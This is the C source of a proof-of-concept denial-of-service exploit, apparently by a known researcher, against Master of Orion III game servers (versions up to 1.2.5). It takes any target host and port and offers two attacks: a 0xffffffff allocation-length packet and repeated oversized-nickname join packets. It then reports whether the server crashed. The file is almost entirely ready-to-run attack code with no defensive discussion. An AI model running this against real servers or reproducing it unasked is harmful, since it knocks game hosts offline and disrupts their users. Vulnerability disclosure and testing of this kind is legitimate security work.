/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
#endif



#define VER     "0.1"
#define PORT    25711
#define BUFFSZ  2048
#define TIMEOUT 3
#define MAX     15
#define PCK1    "gniP" "nnoC"   /* Connection Ping */ \
                "\x02\x00\x00\x00\x01\x41\x66\xFF\x08\x00\x00\x00\x00\x00"
#define PCK2    "ofnI" "trtS"   /* Start info */ \
                "\x02\x00\x02\x00\x01\x01\x00\x00\x00" \
                "\xff"          /* nickname size followed by nickname (wide chars) */ \
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

#define SEND(x) tmp = htonl(sizeof(x) - 1); \
                if(send(sd, (void *)&tmp, 4, 0) \
                  < 0) std_err(); \
                if(send(sd, x, sizeof(x) - 1, 0) \
                  < 0) std_err();

#define RECV(x) for(tot = 0; tot < x; tot += tmp) { \
                    tmp = recv(sd, buff + tot, BUFFSZ - tot, 0); \
                    if(tmp < 0) std_err(); \
                    if(!tmp) break; \
                }



int timeout(int sock);
u_long resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    int     sd,
            i,
            len,
            tot,
            tmp;
    u_short port = PORT;
    u_char  buff[BUFFSZ];
    struct  sockaddr_in peer;


    setbuf(stdout, NULL);

    fputs("\n"
        "Master of Orion III <= 1.2.5 server crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <server> [port(%d)]\n"
            "\n"
            "Attack:\n"
            " 1 = fast allocation exit\n"
            " 2 = multiple big nicknames crash\n"
            "\n", argv[0], PORT);
        exit(1);
    }

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    if(argc > 3) port = atoi(argv[3]);

    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s:%hu\n",
        inet_ntoa(peer.sin_addr), port);

    if(atoi(argv[1]) == 2) {
        printf("- make max %d connections sending a big nickname\n", MAX);
        for(i = 1; i <= MAX; i++) {
            printf("  Connection: %d\n", i);
            sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
            if(sd < 0) std_err();
            if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
              < 0) std_err();

            fputs("- send join ping\n", stdout);
            SEND(PCK1);

            RECV(4);
            len = ntohl(*(u_long *)buff);
            RECV(len);

            fputs("- send join data\n", stdout);
            SEND(PCK2);

            fputs("- check if server is crashed\n", stdout);
            if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) <= 0)) {
                fputs("\nServer IS vulnerable!!!\n", stdout);
                close(sd);
                break;
            }

            close(sd);
        }
        if(i > MAX) fputs("\nServer doesn't seem vulnerable\n", stdout);

    } else {
        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();
        if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();

        fputs("- send BOOM data\n", stdout);
        len = 0xffffffff;   // bytes to allocate in memory
        if(send(sd, (void *)&len, 4, 0)
          < 0) std_err();

        if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) <= 0)) {
            fputs("\nServer IS vulnerable!!!\n", stdout);
        } else {
            fputs("\nServer doesn't seem vulnerable\n", stdout);
        }

        close(sd);
    }

    return(0);
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_long resolv(char *host) {
    struct  hostent *hp;
    u_long  host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_long *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif



